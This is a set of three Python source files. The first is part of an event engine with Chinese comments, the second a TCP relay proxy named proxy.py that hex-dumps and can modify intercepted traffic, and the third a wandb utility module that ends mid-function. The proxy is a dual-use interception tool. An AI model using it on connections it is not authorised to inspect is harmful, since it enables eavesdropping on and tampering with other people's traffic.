self.__timer = Thread(target = self.__runTimer)
self.__timerActive = False # 计时器工作状态
self.__timerSleep = 1 # 计时器触发间隔(默认1秒)
# 这里的__handlers是一个字典,用来保存对应的事件调用关系
# 其中每个键对应的值是一个列表,列表中保存了对该事件进行监听的函数功能
self.__handlers = defaultdict(list)
#----------------------------------------------------------------------
def __run(self):
"""引擎运行"""
while self.__active == True:
try:
event = self.__queue.get(block = True, timeout = 1) # 获取事件的阻塞时间设为1秒
self.__process(event)
except Empty:
pass
#----------------------------------------------------------------------
def __process(self, event):
"""处理事件"""
# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
#----------------------------------------------------------------------
def __runTimer(self):
"""运行在计时器线程中的循环函数"""
while self.__timerActive:
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
# 等待
sleep(self.__timerSleep)
#----------------------------------------------------------------------
def start(self):
"""引擎启动"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
self.__timerActive = True
self.__timer.start()
#----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timerActive = False
self.__timer.join()
# 等待事件处理线程退出
self.__thread.join()
#----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
#----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
#----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
########################################################################
class Event:
"""事件对象"""
#----------------------------------------------------------------------
def __init__(self, type_=None):
"""Constructor"""
self.type_ = type_ # 事件类型
self.dict_ = {} # 字典用于保存具体的事件数据
#----------------------------------------------------------------------
def test():
"""测试函数"""
import sys
from datetime import datetime
from PyQt4.QtCore import QCoreApplication
def simpletest(event):
print u'处理每秒触发的计时器事件:%s' % str(datetime.now())
app = QCoreApplication(sys.argv)
ee = EventEngine2()
ee.register(EVENT_TIMER, simpletest)
ee.start()
app.exec_()
# 直接运行脚本可以进行测试
if __name__ == '__main__':
test()
|
proxy.py
|
#!/usr/bin/env python3
import sys
import socket
import threading
def server_loop(local_host, local_port, remote_host, remote_port, receive_first):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.bind((local_host, local_port))
except:
print("[!!] Failed to listen on %s:%d" % (local_host, local_port))
print("[!!] Check for other listening socket or correct permissions.")
sys.exit(0)
print("[*] Listening on %s:%d" % (local_host, local_port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# print out the local connection info
print("[==>] Received incoming connection from %s:%d" % (addr[0], addr[1]))
# start a thread to talk to the remote host
proxy_thread = threading.Thread(target=proxy_handler, args=(client_socket, remote_host, remote_port, receive_first))
proxy_thread.start()
# this is a pretty hex dumping function directly taken from the comments here:
# http://code.activestate.com/recipes/142812-hex-dumper/
# https://stackoverflow.com/questions/46869155/trying-to-convert-a-hexdump-from-python2-to-python3
def hexdump(src, length=16):
result = []
digits = 4
s = src[:]
print(s)
hexa = " ".join(["%0*X" % (digits, ord(x)) for x in s])
text = "".join([x if 0x20 <= ord(x) < 0x7F else "." for x in s])
result.append("%04X %-*s %s" % (1, length * (digits + 1), hexa, text))
print('\n'.join(result))
def receive_from(connection):
buffer = ""
# We set a 2 second timeout; depending on your
# target, this may need to be adjusted
connection.settimeout(5)
try:
# keep reading into the buffer until there's no more data
# or we time out
while True:
data = connection.recv(4096)
if not data:
break
buffer += data.decode()
except:
pass
return buffer
# modify any request destined for the remote host
def request_handler(buffer):
# perform packet modifications
return buffer
# modify any response destined for the local host
def response_handler(buffer):
# perform packet modifications
return buffer
def proxy_handler(client_socket, remote_host, remote_port, receive_first):
# connect to the remote host
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((remote_host, remote_port))
# recieve data from the remote end if necessary
if receive_first:
remote_buffer = receive_from(remote_socket)
hexdump(remote_buffer)
#send it to our response handler
remote_buffer = response_handler(remote_buffer)
# if we have data to send to our local client, send it
if len(remote_buffer):
print("[<==] Sending %d bytes to localhost." % len(remote_buffer))
client_socket.send(remote_buffer.encode())
# no lets loop and read from local, send to remote, send to local
# rinse, wash, repeat
while True:
# read from local host
local_buffer = receive_from(client_socket)
if len(local_buffer):
print("[==>] Received %d bytes from localhost." % len(local_buffer))
hexdump(local_buffer)
# send it to our request handler
local_buffer = request_handler(local_buffer)
# send off the data to the remote host
remote_socket.send(local_buffer.encode())
print("[==>] Sent to remote.")
# receive back the response
remote_buffer = receive_from(remote_socket)
if len(remote_buffer):
print("[<==] Received %d bytes from remote." % len(remote_buffer))
hexdump(remote_buffer)
# send to our response handler
remote_buffer = response_handler(remote_buffer)
# send the response to the local socket
client_socket.send(remote_buffer.encode())
print("[<==] Sent to localhost.")
# if no more data on either side, close the connections
if not len(local_buffer) or not len(remote_buffer):
client_socket.close()
remote_socket.close()
print("[*] No more data. Closing connections.")
break
def main():
# no fancy commandline parsing here
if len(sys.argv[1:]) != 5:
print(
"""
Usage: ./proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]
Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True
"""
)
sys.exit(0)
# setup local listening parameters
local_host = sys.argv[1]
local_port = int(sys.argv[2])
# setup remote target
remote_host = sys.argv[3]
remote_port = int(sys.argv[4])
# this tells our proxy to connect and receive data
# before sending to the remote host
receive_first = sys.argv[5]
if "True" in receive_first:
receive_first = True
else:
receive_first = False
# now spin up our listening socket
server_loop(local_host, local_port, remote_host, remote_port, receive_first)
if __name__ == "__main__":
main()
|
util.py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import base64
import binascii
import colorsys
import contextlib
import codecs
import errno
import functools
import gzip
import hashlib
import json
import logging
import math
import numbers
import traceback
import os
import re
import shlex
import socket
import sys
import threading
import time
import random
import shortuuid
import importlib
import tarfile
import tempfile
import types
from typing import Optional
import yaml
from datetime import date, datetime
import platform
from six.moves import urllib
from typing import Any, Dict
import requests
import six
from six.moves import queue, input
from sys import getsizeof
from six.moves.collections_abc import Mapping, Sequence
from importlib import import_module
import sentry_sdk
from sentry_sdk import capture_exception
from sentry_sdk import capture_message
from wandb.env import error_reporting_enabled, get_app_url
import wandb
from wandb import env
from wandb.errors import CommError, term
logger = logging.getLogger(__name__)
_not_importable = set()
# Boolean, unsigned integer, signed integer, float, complex.
NUMERIC_KINDS = set("buifc")
MAX_LINE_BYTES = (10 << 20) - (100 << 10) # imposed by back end
IS_GIT = os.path.exists(os.path.join(os.path.dirname(__file__), "..", ".git"))
RE_WINFNAMES = re.compile('[<>:"/\?*]')
# these match the environments for gorilla
if IS_GIT:
SENTRY_ENV = "development"
else:
SENTRY_ENV = "production"
if error_reporting_enabled():
sentry_sdk.init(
dsn="https://a2f1d701163c42b097b9588e56b1c37e@o151352.ingest.sentry.io/5288891",
release=wandb.__version__,
default_integrations=False,
environment=SENTRY_ENV,
)
POW_10_BYTES = [
("B", 10 ** 0),
("KB", 10 ** 3),
("MB", 10 ** 6),
("GB", 10 ** 9),
("TB", 10 ** 12),
("PB", 10 ** 15),
("EB", 10 ** 18),
]
POW_2_BYTES = [
("B", 2 ** 0),
("KiB", 2 ** 10),
("MiB", 2 ** 20),
("GiB", 2 ** 30),
("TiB", 2 ** 40),
("PiB", 2 ** 50),
("EiB", 2 ** 60),
]
def sentry_message(message):
if error_reporting_enabled():
capture_message(message)
def sentry_exc(exc, delay=False):
if error_reporting_enabled():
if isinstance(exc, six.string_types):
capture_exception(Exception(exc))
else:
capture_exception(exc)
if delay:
time.sleep(2)
def sentry_reraise(exc):
"""Re-raise an exception after logging it to Sentry
Use this for top-level exceptions when you want the user to see the traceback.
Must be called from within an exception handler.
"""
sentry_exc(exc)
# this will messily add this "reraise" function to the stack trace
# but hopefully it's not too bad
six.reraise(type(exc), exc, sys.exc_info()[2])
def sentry_set_scope(process_context, entity, project, email=None, url=None):
# Using GLOBAL_HUB means these tags will persist between threads.
# Normally there is one hub per thread.
with sentry_sdk.hub.GLOBAL_HUB.configure_scope() as scope:
scope.set_tag("process_context", process_context)
scope.set_tag("entity", entity)
scope.set_tag("project", project)
if email:
scope.user = {"email": email}
if url:
scope.set_tag("url", url)
def vendor_setup():
"""This enables us to use the vendor directory for packages we don't depend on
Returns a function to call after imports are complete. Make sure to call this
function or you will modify the user's path which is never good. The pattern should be:
reset_path = vendor_setup()
# do any vendor imports...
reset_path()
"""
original_path = [directory for directory in sys.path]
def reset_import_path():
sys.path = original_path
parent_dir = os.path.abspath(os.path.dirname(__file__))
vendor_dir = os.path.join(parent_dir, "vendor")
vendor_packages = ("gql-0.2.0", "graphql-core-1.1")
package_dirs = [os.path.join(vendor_dir, p) for p in vendor_packages]
for p in [vendor_dir] + package_dirs:
if p not in sys.path:
sys.path.insert(1, p)
return reset_import_path
def apple_gpu_stats_binary():
parent_dir = os.path.abspath(os.path.dirname(__file__))
return os.path.join(parent_dir, "bin", "apple_gpu_stats")
def vendor_import(name):
reset_path = vendor_setup()
module = import_module(name)
reset_path()
return module
def get_module(name, required=None):
"""
Return module or None. Absolute import is required.
:param (str) name: Dot-separated module path. E.g., 'scipy.stats'.
:param (str) required: A string to raise a ValueError if missing
:return: (module|None) If import succeeds, the module will be returned.
"""
if name not in _not_importable:
try:
return import_module(name)
except Exception as e:
_not_importable.add(name)
msg = "Error importing optional module {}".format(name)
if required:
logger.exception(msg)
if required and name in _not_importable:
raise wandb.Error(required)
def get_optional_module(name) -> Optional["importlib.ModuleInterface"]:
return get_module(name)
class LazyLoader(types.ModuleType):
"""Lazily import a module, mainly to avoid pulling in large dependencies.
we use this for tensorflow and other optional libraries primarily at the top module level
"""
# The lint error here is incorrect.
def __init__(
self, local_name, parent_module_globals, name, warning=None
): # pylint: disable=super-on-old-class
self._local_name = local_name
self._parent_module_globals = parent_module_globals
self._warning = warning
super(LazyLoader, self).__init__(name)
def _load(self):
"""Load the module and insert it into the parent's globals."""
# Import the target module and insert it into the parent's namespace
module = importlib.import_module(self.__name__)
self._parent_module_globals[self._local_name] = module
# Emit a warning if one was specified
if self._warning:
print(self._warning)
# Make sure to only warn once.
self._warning = None
# Update this object's dict so that if someone keeps a reference to the
# LazyLoader, lookups are efficient (__getattr__ is only called on lookups
# that fail).
self.__dict__.update(module.__dict__)
return module
def __getattr__(self, item):
module = self._load()
return getattr(module, item)
def __dir__(self):
module = self._load()
return dir(module)
class PreInitObject(object):
def __init__(self, name):
self._name = name
def __getitem__(self, key):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key)
)
def __setitem__(self, key, value):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key)
)
def __setattr__(self, key, value):
if not key.startswith("_"):
raise wandb.Error(
"You must call wandb.init() before {}.{}".format(self._name, key)
)
else:
return object.__setattr__(self, key, value)
def __getattr__(self, key):
if not key.startswith("_"):
raise wandb.Error(
"You must call wandb.init() before {}.{}".format(self._name, key)
)
else:
raise AttributeError()
np = get_module("numpy")
# TODO: Revisit these limits
VALUE_BYTES_LIMIT = 100000
def app_url(api_url):
"""Returns the frontend app url without a trailing slash."""
# TODO: move me to settings
app_url = get_app_url()
if app_url is not None:
return app_url.strip("/")
if "://api.wandb.test" in api_url:
# dev mode
return api_url.replace("://api.", "://app.").strip("/")
elif "://api.wandb." in api_url:
# cloud
return api_url.replace("://api.", "://").strip("/")
elif "://api." in api_url:
# onprem cloud
return api_url.replace("://api.", "://app.").strip("/")
# wandb/local
return api_url
def get_full_typename(o):
"""We determine types based on type names so we don't have to import
(and therefore depend on) PyTorch, TensorFlow, etc.
"""
instance_name = o.__class__.__module__ + "." + o.__class__.__name__
if instance_name in ["builtins.module", "__builtin__.module"]:
return o.__name__
else:
return instance_name
def get_h5_typename(o):
typename = get_full_typename(o)
if is_tf_tensor_typename(typename):
return "tensorflow.Tensor"
elif is_pytorch_tensor_typename(typename):
return "torch.Tensor"
else:
return o.__class__.__module__.split(".")[0] + "." + o.__class__.__name__
def is_uri(string):
parsed_uri = urllib.parse.urlparse(string)
return len(parsed_uri.scheme) > 0
def local_file_uri_to_path(uri):
"""
Convert URI to local filesystem path.
No-op if the uri does not have the expected scheme.
"""
path = urllib.parse.urlparse(uri).path if uri.startswith("file:") else uri
return urllib.request.url2pathname(path)
def get_local_path_or_none(path_or_uri):
"""Check if the argument is a local path (no scheme or file:///) and return local path if true,
None otherwise.
"""
parsed_uri = urllib.parse.urlparse(path_or_uri)
if (
len(parsed_uri.scheme) == 0
or parsed_uri.scheme == "file"
and len(parsed_uri.netloc) == 0
):
return local_file_uri_to_path(path_or_uri)
else:
return None
def make_tarfile(output_filename, source_dir, archive_name, custom_filter=None):
# Helper for filtering out modification timestamps
def _filter_timestamps(tar_info):
tar_info.mtime = 0
return tar_info if custom_filter is None else custom_filter(tar_info)
unzipped_filename = tempfile.mktemp()
try:
with tarfile.open(unzipped_filename, "w") as tar:
tar.add(source_dir, arcname=archive_name, filter=_filter_timestamps)
# When gzipping the tar, don't include the tar's filename or modification time in the
# zipped archive (see https://docs.python.org/3/library/gzip.html#gzip.GzipFile)
with gzip.GzipFile(
filename="", fileobj=open(output_filename, "wb"), mode="wb", mtime=0
) as gzipped_tar, open(unzipped_filename, "rb") as tar:
gzipped_tar.write(tar.read())
finally:
os.remove(unzipped_filename)
def _user_args_to_dict(arguments):
user_dict = {}
i = 0
while i < len(arguments):
arg = arguments[i]
split = arg.split("=", maxsplit=1)
# flag arguments don't require a value -> set to True if specified
if len(split) == 1 and (
i + 1 >= len(arguments) or arguments[i + 1].startswith("-")
):
name = split[0].lstrip("-")
value = True
i += 1
elif len(split) == 1 and not arguments[i + 1].startswith("-"):
name = split[0].lstrip("-")
value = arguments[i + 1]
i += 2
elif len(split) == 2:
name = split[0].lstrip("-")
value = split[1]
i += 1
if name in user_dict:
wandb.termerror("Repeated parameter: '%s'" % name)
sys.exit(1)
user_dict[name] = value
return user_dict
def is_tf_tensor(obj):
import tensorflow
return isinstance(obj, tensorflow.Tensor)
def is_tf_tensor_typename(typename):
return typename.startswith("tensorflow.") and (
"Tensor" in typename or "Variable" in typename
)
def is_tf_eager_tensor_typename(typename):
return typename.startswith("tensorflow.") and ("EagerTensor" in typename)
def is_pytorch_tensor(obj):
import torch
return isinstance(obj, torch.Tensor)
def is_pytorch_tensor_typename(typename):
return typename.startswith("torch.") and (
"Tensor" in typename or "Variable" in typename
)
def is_jax_tensor_typename(typename):
return typename.startswith("jaxlib.") and "DeviceArray" in typename
def get_jax_tensor(obj):
import jax
return jax.device_get(obj)
def is_fastai_tensor_typename(typename):
return typename.startswith("fastai.") and ("Tensor" in typename)
def is_pandas_data_frame_typename(typename):
return typename.startswith("pandas.") and "DataFrame" in typename
def is_matplotlib_typename(typename):
return typename.startswith("matplotlib.")
def is_plotly_typename(typename):
return typename.startswith("plotly.")
def is_plotly_figure_typename(typename):
return typename.startswith("plotly.") and typename.endswith(".Figure")
def is_numpy_array(obj):
return np and isinstance(obj, np.ndarray)
def is_pandas_data_frame(obj):
return is_pandas_data_frame_typename(get_full_typename(obj))
def ensure_matplotlib_figure(obj):
"""Extract the current figure from a matplotlib object or return the object if it's a figure.
raises ValueError if the object can't be converted.
"""
import matplotlib
from matplotlib.figure import Figure
# plotly and matplotlib broke in recent releases,
# this patches matplotlib to add a removed method that plotly assumes exists
from matplotlib.spines import Spine
def is_frame_like(self):
"""Return True if directly on axes frame.
This is useful for determining if a spine is the edge of an
old style MPL plot. If so, this function will return True.
"""
position = self._position or ("outward", 0.0)
if isinstance(position, str):
if position == "center":
position = ("axes", 0.5)
elif position == "zero":
position = ("data", 0)
if len(position) != 2:
raise ValueError("position should be 2-tuple")
position_type, amount = position
if position_type == "outward" and amount == 0:
return True
else:
return False
Spine.is_frame_like = is_frame_like
if obj == matplotlib.pyplot:
obj = obj.gcf()
elif not isinstance(obj, Figure):
if hasattr(obj, "figure"):
obj = obj.figure
# Some matplotlib objects have a figure function
if not isinstance(obj, Figure):
raise ValueError(
"Only matplotlib.pyplot or matplotlib.pyplot.Figure objects are accepted."
)
return obj
def matplotlib_to_plotly(obj):
obj = ensure_matplotlib_figure(obj)
tools = get_module(
"plotly.tools",
required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`",
)
return tools.mpl_to_plotly(obj)
def matplotlib_contains_images(obj):
obj = ensure_matplotlib_figure(obj)
return any(len(ax.images) > 0 for ax in obj.axes)
def json_friendly(obj):
"""Convert an object into something that's more becoming of JSON"""
converted = True
typename = get_full_typename(obj)
if is_tf_eager_tensor_typename(typename):
obj = obj.numpy()
elif is_tf_tensor_typename(typename):
try:
obj = obj.eval()
except RuntimeError:
obj = obj.numpy()
elif is_pytorch_tensor_typename(typename) or is_fastai_tensor_typename(typename):
try:
if obj.requires_grad:
obj = obj.detach()
except AttributeError:
pass # before 0.4 is only present on variables
try:
obj = obj.data
except RuntimeError:
pass # happens for Tensors before 0.4
if obj.size():
obj = obj.cpu().detach().numpy()
else:
return obj.item(), True
elif is_jax_tensor_typename(typename):
obj = get_jax_tensor(obj)
if is_numpy_array(obj):
if obj.size == 1:
obj = obj.flatten()[0]
elif obj.size <= 32:
obj = obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
if isinstance(obj, float) and math.isnan(obj):
obj = None
elif isinstance(obj, np.generic) and obj.dtype.kind == "f":
# obj is a numpy float with precision greater than that of native python float
# (i.e., float96 or float128). in this case obj.item() does not return a native
# python float to avoid loss of precision, so we need to explicitly cast this
# down to a 64bit float
obj = float(obj)
elif isinstance(obj, bytes):
obj = obj.decode("utf-8")
elif isinstance(obj, (datetime, date)):
obj = obj.isoformat()
elif callable(obj):
obj = (
"{}.{}".format(obj.__module__, obj.__qualname__)
if hasattr(obj, "__qualname__") and hasattr(obj, "__module__")
else str(obj)
)
elif isinstance(obj, float) and math.isnan(obj):
obj = None
else:
converted = False
if getsizeof(obj) > VALUE_BYTES_LIMIT:
wandb.termwarn(
"Serializing object of type {} that is {} bytes".format(
type(obj).__name__, getsizeof(obj)
)
)
return obj, converted
def json_friendly_val(val):
"""Make any value (including dict, slice, sequence, etc) JSON friendly"""
if isinstance(val, dict):
converted = {}
for key, value in six.iteritems(val):
converted[key] = json_friendly_val(value)
return converted
if isinstance(val, slice):
converted = dict(
slice_start=val.start, slice_step=val.step, slice_stop=val.stop
)
return converted
val, _ = json_friendly(val)
if isinstance(val, Sequence) and not isinstance(val, six.string_types):
converted = []
for value in val:
converted.append(json_friendly_val(value))
return converted
else:
if val.__class__.__module__ not in ("builtins", "__builtin__"):
val = str(val)
return val
def convert_plots(obj):
if is_matplotlib_typename(get_full_typename(obj)):
tools = get_module(
"plotly.tools",
required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`",
)
obj = tools.mpl_to_plotly(obj)
if is_plotly_typename(get_full_typename(obj)):
return {"_type": "plotly", "plot": obj.to_plotly_json()}
else:
return obj
def maybe_compress_history(obj):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return wandb.Histogram(obj, num_bins=32).to_json(), True
else:
return obj, False
def maybe_compress_summary(obj, h5_typename):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return (
{
"_type": h5_typename, # may not be ndarray
"var": np.var(obj).item(),
"mean": np.mean(obj).item(),
"min": np.amin(obj).item(),
"max": np.amax(obj).item(),
"10%": np.percentile(obj, 10),
"25%": np.percentile(obj, 25),
"75%": np.percentile(obj, 75),
"90%": np.percentile(obj, 90),
"size": obj.size,
},
True,
)
else:
return obj, False
def launch_browser(attempt_launch_browser=True):
"""Decide if we should launch a browser"""
_DISPLAY_VARIABLES = ["DISPLAY", "WAYLAND_DISPLAY", "MIR_SOCKET"]
_WEBBROWSER_NAMES_BLACKLIST = ["www-browser", "lynx", "links", "elinks", "w3m"]
import webbrowser
launch_browser = attempt_launch_browser
if launch_browser:
if "linux" in sys.platform and not any(
os.getenv(var) for var in _DISPLAY_VARIABLES
):
launch_browser = False
try:
browser = webbrowser.get()
if hasattr(browser, "name") and browser.name in _WEBBROWSER_NAMES_BLACKLIST:
launch_browser = False
except webbrowser.Error:
launch_browser = False
return launch_browser
def generate_id(length=8):
# ~3t run ids (36**8)
run_gen = shortuuid.ShortUUID(alphabet=list("0123456789abcdefghijklmnopqrstuvwxyz"))
return run_gen.random(length)
def parse_tfjob_config():
"""Attempts to parse TFJob config, returning False if it can't find it"""
if os.getenv("TF_CONFIG"):
try:
return json.loads(os.environ["TF_CONFIG"])
except ValueError:
return False
else:
return False
class WandBJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
if hasattr(obj, "json_encode"):
return obj.json_encode()
# if hasattr(obj, 'to_json'):
# return obj.to_json()
tmp_obj, converted = json_friendly(obj)
if converted:
return tmp_obj
return json.JSONEncoder.default(self, obj)
class WandBJSONEncoderOld(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
tmp_obj, converted = json_friendly(obj)
tmp_obj, compressed = maybe_compress_summary(tmp_obj, get_h5_typename(obj))
if converted:
return tmp_obj
return json.JSONEncoder.default(self, tmp_obj)
class WandBHistoryJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
obj, converted = json_friendly(obj)
obj, compressed = maybe_compress_history(obj)
if converted:
return obj
return json.JSONEncoder.default(self, obj)
class JSONEncoderUncompressed(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
if is_numpy_array(obj):
return obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
return json.JSONEncoder.default(self, obj)
def json_dump_safer(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=WandBJSONEncoder, **kwargs)
def json_dumps_safer(obj, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dumps(obj, cls=WandBJSONEncoder, **kwargs)
# This is used for dumping raw json into files
def json_dump_uncompressed(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=JSONEncoderUncompressed, **kwargs)
def json_dumps_safer_history(obj, **kwargs):
"""Convert obj to json, with some extra encodable types, including histograms"""
return json.dumps(obj, cls=WandBHistoryJSONEncoder, **kwargs)
def make_json_if_not_number(v):
"""If v is not a basic type convert it to json."""
if isinstance(v, (float, int)):
return v
return json_dumps_safer(v)
def make_safe_for_json(obj):
"""Replace invalid json floats with strings. Also converts to lists and dicts."""
if isinstance(obj, Mapping):
return {k: make_safe_for_json(v) for k, v in obj.items()}
elif isinstance(obj, str):
# str's are Sequence, so we need to short-circuit
return obj
elif isinstance(obj, Sequence):
return [make_safe_for_json(v) for v in obj]
elif isinstance(obj, float):
# W&B backend and UI handle these strings
if obj != obj: # standard way to check for NaN
return "NaN"
elif obj == float("+inf"):
return "Infinity"
elif obj == float("-inf"):
return "-Infinity"
return obj
def mkdir_exists_ok(path):
try:
os.makedirs(path)
return True
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
return False
else:
raise
def no_retry_auth(e):
if hasattr(e, "exception"):
e = e.exception
if not isinstance(e, requests.HTTPError):
return True
if e.response is None:
return True
# Don't retry bad request errors; raise immediately
if e.response.status_code in (400, 409):
return False
# Retry all non-forbidden/unauthorized/not-found errors.
if e.response.status_code not in (401, 403, 404):
return True
# Crash w/message on forbidden/unauthorized errors.
if e.response.status_code == 401:
raise CommError("Invalid or missing api_key. Run wandb login")
elif wandb.run:
raise CommError("Permission denied to access {}".format(wandb.run.path))
else:
raise CommError("Permission denied, ask the project owner to grant you access")
def find_runner(program):
"""Return a command that will run program.
Arguments:
program: The string name of the program to try to run.
Returns:
commandline list of strings to run the program (eg. with subprocess.call()) or None
"""
if os.path.isfile(program) and not os.access(program, os.X_OK):
# program is a path to a non-executable file
try:
opened = open(program)
except IOError: # PermissionError doesn't exist in 2.7
return None
first_line = opened.readline().strip()
if first_line.startswith("#!"):
return shlex.split(first_line[2:])
if program.endswith(".py"):
return [sys.executable]
return None
def downsample(values, target_length):
"""Downsamples 1d values to target_length, including start and end.
Algorithm just rounds index down.
Values can be any sequence, including a generator.
"""
assert target_length > 1
values = list(values)
if len(values) < target_length:
return values
ratio = float(len(values) - 1) / (target_length - 1)
result = []
for i in range(target_length):
result.append(values[int(i * ratio)])
return result
def has_num(dictionary, key):
return key in dictionary and isinstance(dictionary[key], numbers.Number)
def md5_file(path):
hash_md5 = hashlib.md5()
with open(path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return base64.b64encode(hash_md5.digest()).decode("ascii")
def get_log_file_path():
"""Log file path used in error messages.
It would probably be better if this pointed to a log file in a
run directory.
"""
# TODO(jhr, cvp): refactor
if wandb.run:
return wandb.run._settings.log_internal
return os.path.join("wandb", "debug-internal.log")
def docker_image_regex(image):
"regex for valid docker image names"
if image:
return re.match(
r"^(?:(?=[^:\/]{1,253})(?!-)[a-zA-Z0-9-]{1,63}(?<!-)(?:\.(?!-)[a-zA-Z0-9-]{1,63}(?<!-))*(?::[0-9]{1,5})?/)?((?![._-])(?:[a-z0-9._-]*)(?<![._-])(?:/(?![._-])[a-z0-9._-]*(?<![._-]))*)(?::(?![.-])[a-zA-Z0-9_.-]{1,128})?$",
image,
)
def image_from_docker_args(args):
"""This scans docker run args and attempts to find the most likely docker image argument.
If excludes any argments that start with a dash, and the argument after it if it isn't a boolean
switch. This can be improved, we currently fallback gracefully when this fails.
"""
bool_args = [
"-t",
"--tty",
"--rm",
"--privileged",
"--oom-kill-disable",
"--no-healthcheck",
"-i",
"--interactive",
"--init",
"--help",
"--detach",
"-d",
"--sig-proxy",
"-it",
"-itd",
]
last_flag = -2
last_arg = ""
possible_images = []
if len(args) > 0 and args[0] == "run":
args.pop(0)
for i, arg in enumerate(args):
if arg.startswith("-"):
last_flag = i
last_arg = arg
elif "@sha256:" in arg:
# Because our regex doesn't match digests
possible_images.append(arg)
elif docker_image_regex(arg):
if last_flag == i - 2:
possible_images.append(arg)
elif "=" in last_arg:
possible_images.append(arg)
elif last_arg in bool_args and last_flag == i - 1:
possible_images.append(arg)
most_likely = None
for img in possible_images:
if ":" in img or "@" in img or "/" in img:
most_likely = img
break
if most_likely == None and len(possible_images) > 0:
most_likely = possible_images[0]
return most_likely
def load_yaml(file):
"""If pyyaml > 5.1 use full_load to avoid warning"""
if hasattr(yaml, "full_load"):
return yaml.full_load(file)
else:
return yaml.load(file)
def image_id_from_k8s():
"""Pings the k8s metadata service for the image id. Specify the
KUBERNETES_NAMESPACE environment variable if your pods are not in
the default namespace:
- name: KUBERNETES_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
"""
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
if os.path.exists(token_path):
k8s_server = "https://{}:{}/api/v1/namespaces/{}/pods/{}".format(
os.getenv("KUBERNETES_SERVICE_HOST"),
os.getenv("KUBERNETES_PORT_443_TCP_PORT"),
os.getenv("KUBERNETES_NAMESPACE", "default"),
os.getenv("HOSTNAME"),
)
try:
res = requests.get(
k8s_server,
verify="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
timeout=3,
headers={"Authorization": "Bearer {}".format(open(token_path).read())},
)
res.raise_for_status()
except requests.RequestException:
return None
try:
return res.json()["status"]["containerStatuses"][0]["imageID"].strip(
"docker-pullable://"
)
except (ValueError, KeyError, IndexError):
logger.exception("Error checking kubernetes for image id")
return None
def async_call(target, timeout=None):
"""Accepts a method and optional timeout.
Returns a new method that will call the original with any args, waiting for upto timeout seconds.
This new method blocks on the original and returns the result or None
if timeout was reached, along with the thread.
You can check thread.is_alive() to determine if a timeout was reached.
If an exception is thrown in the thread, we reraise it.
"""
q = queue.Queue()
def wrapped_target(q, *args, **kwargs):
try:
q.put(target(*args, **kwargs))
except Exception as e:
q.put(e)
def wrapper(*args, **kwargs):
thread = threading.Thread(
target=wrapped_target, args=(q,) + args, kwargs=kwargs
)
thread.daemon = True
thread.start()
try:
result = q.get(True, timeout)
if isinstance(result, Exception):
six.reraise(type(result), result, sys.exc_info()[2])
return result, thread
except queue.Empty:
return None, thread
return wrapper
def read_many_from_queue(q, max_items, queue_timeout):
try:
item = q.get(True, queue_timeout)
except queue.Empty:
return []
items = [item]
for i in range(max_items):
try:
item = q.get_nowait()
except queue.Empty:
return items
items.append(item)
return items
def stopwatch_now():
"""Get a timevalue for interval comparisons
When possible it is a monotonic clock to prevent backwards time issues.
"""
if six.PY2:
now = time.time()
else:
now = time.monotonic()
return now
def class_colors(class_count):
# make class 0 black, and the rest equally spaced fully saturated hues
return [[0, 0, 0]] + [
colorsys.hsv_to_rgb(i / (class_count - 1.0), 1.0, 1.0)
for i in range(class_count - 1)
]
def _prompt_choice(input_timeout: int = None, jupyter: bool = False,) -> str:
